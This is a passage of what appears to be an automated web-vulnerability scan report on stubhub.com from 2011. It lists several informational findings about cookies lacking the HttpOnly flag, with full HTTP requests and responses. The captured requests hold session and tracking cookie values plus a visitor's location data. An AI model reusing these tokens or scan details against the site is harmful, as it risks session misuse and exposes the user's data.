Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; mbox=PC#1308447436655-203098.17#1342781785|check#true#1308567445|session#1308567384165-120206#1308569245; s_pers=%20s_nr%3D1308567426309-Repeat%7C1342695426309%3B%20currentCTC%3DRF%253A%2520burp%7C1311159426314%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%255D%7C1466420226317%3B%20currentCVP%3DRF%253A%2520burp%7C1311159426319%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%255D%7C1466420226321%3B; bn_u=6923598397700396013; bn_recs=baynoteOFF; TLTHID=E493C48AB23510B20181E6948C34E401; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:37 GMT
Server: Apache
Set-Cookie: TLTHID=E551BC2EB23510B2DFDBC89D01B99543; Path=/; Domain=.stubhub.com
Last-Modified: Tue, 02 Feb 2010 04:41:07 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1800
Expires: Tue, 19 Jul 2011 19:05:37 GMT
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/css


14.161. http://www.stubhub.com/content/getPromoContent  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /content/getPromoContent

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /content/getPromoContent HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
Content-Length: 27
Origin: http://www.stubhub.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; s_pers=%20s_nr%3D1308567426309-Repeat%7C1342695426309%3B%20currentCTC%3DRF%253A%2520burp%7C1311159426314%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%255D%7C1466420226317%3B%20currentCVP%3DRF%253A%2520burp%7C1311159426319%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%255D%7C1466420226321%3B; bn_u=6923598397700396013; bn_recs=baynoteOFF; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; TLTHID=E6BAADE6B23510B2DB31CE1C46E5CCE3; fsr.a=1311100549160; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""}}; s_sess=%20s_cc%3Dtrue%3B

pageType=BrowseTicketDetail

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:23 GMT
Server: Apache
Set-Cookie: TLTHID=01333828B23610B20B11F351420A2498; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 572c#f98b1/getPromoContent@srwp01brs006.stubprod.com
com-stubhub-dye: 572c#f98b1/getPromoContent@srwp01brs006.stubprod.com
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 71

<?xml version="1.0" encoding="UTF-8"?><blocks>No Promo Content</blocks>

14.162. http://www.stubhub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; bn_recs=baynoteOFF; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""}}; TLTHID=E8A4044AB23510B2043FC687D11520A8; s_pers=%20s_nr%3D1311100550187-Repeat%7C1345228550187%3B%20currentCTC%3DC12289x970%7C1313692550208%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%252C%255B'C12289x970'%252C'1311100550213'%255D%255D%7C1468953350213%3B%20currentCVP%3DRF%253A%2520burp%253EC12289x970%7C1313692550219%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%252C%255B'7%252F19%252F2011%2525206%25253A35%252520PM'%252C'1311100550224'%255D%255D%7C1468953350224%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1311100552198; bn_u=6923598397700396013

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:26 GMT
Server: Apache
Set-Cookie: TLTHID=02B35B92B23610B2CDDBD1ECACF16CE8; Path=/; Domain=.stubhub.com
Last-Modified: Thu, 23 Mar 2006 01:37:46 GMT
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain

..............h.......(....... ........................................V...............3...33..3f..3...3...3...f...f3..ff..f...f...f........3...f...................3...f...................3...f.......
...[SNIP]...

14.163. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml-popup.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /promotions/scratch/foresee_v1/foresee-dhtml-popup.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee_v1/foresee-dhtml-popup.js HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; s_pers=%20s_nr%3D1311100550187-Repeat%7C1345228550187%3B%20currentCTC%3DC12289x970%7C1313692550208%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%252C%255B'C12289x970'%252C'1311100550213'%255D%255D%7C1468953350213%3B%20currentCVP%3DRF%253A%2520burp%253EC12289x970%7C1313692550219%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%252C%255B'7%252F19%252F2011%2525206%25253A35%252520PM'%252C'1311100550224'%255D%255D%7C1468953350224%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=6923598397700396013; bn_recs=baynoteON; TLTHID=EB2903FAB23510B2F895E17C95DDB51E; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""},"v":1,"rid":"1311100555294_43119"}

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:49 GMT
Server: Apache
Set-Cookie: TLTHID=EC632AD4B23510B2E9D1AE6611395988; Path=/; Domain=.stubhub.com
Last-Modified: Fri, 24 Jun 2011 01:19:36 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1800
Expires: Tue, 19 Jul 2011 19:05:49 GMT
Vary: Accept-Encoding
Content-Length: 21520
Content-Type: text/javascript

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
FSR.Element.fsr$implement({fsr$getScrolls:function(){var B=this,A={x:0,y:0};while(B&&!FSR.isBody(B)){A.x+=B.scrollLeft;
A.y+=B.s
...[SNIP]...

14.164. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /promotions/scratch/foresee_v1/foresee-dhtml.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee_v1/foresee-dhtml.css HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1345314947|check#true#1311100607|session#1311100546147-926694#1311102407; s_pers=%20s_nr%3D1311100550187-Repeat%7C1345228550187%3B%20currentCTC%3DC12289x970%7C1313692550208%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%252C%255B'C12289x970'%252C'1311100550213'%255D%255D%7C1468953350213%3B%20currentCVP%3DRF%253A%2520burp%253EC12289x970%7C1313692550219%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%252C%255B'7%252F19%252F2011%2525206%25253A35%252520PM'%252C'1311100550224'%255D%255D%7C1468953350224%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=6923598397700396013; bn_recs=baynoteON; TLTHID=EB2903FAB23510B2F895E17C95DDB51E; fsr.s={"cp":{"userid":"","pagetype":"Browse_event","url":"http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298","genre":"U2 Tickets","genreid":"602","event":"U2 with Interpol Tickets (Rescheduled from 7/19/2010)","eventid":"906484","genreparentid":"602","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$62.00'","fee":"","TT_variant":""},"v":1,"rid":"1311100555294_43119"}

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:48 GMT
Server: Apache
Set-Cookie: TLTHID=EC5CA25EB23510B2D4AA9F0FE0F99B10; Path=/; Domain=.stubhub.com
Last-Modified: Fri, 24 Jun 2011 01:19:13 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1800
Expires: Tue, 19 Jul 2011 19:05:48 GMT
Vary: Accept-Encoding
Content-Length: 3630
Content-Type: text/css

...div.fsrwin {
border: 1px solid #ACACAC;
}

div.fsrwin div {
background: #FFFFFF none repeat scroll 0;
color: #4D4D4D;
font-family: Arial, Helvetica, Sans-Serif;
font-siz
...[SNIP]...

14.165. http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-surveydef.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /promotions/scratch/foresee_v1/foresee-surveydef.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee_v1/foresee-surveydef.js HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; bn_recs=baynoteOFF; TLTSID=E493C48AB23510B20181E6948C34E401; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011; 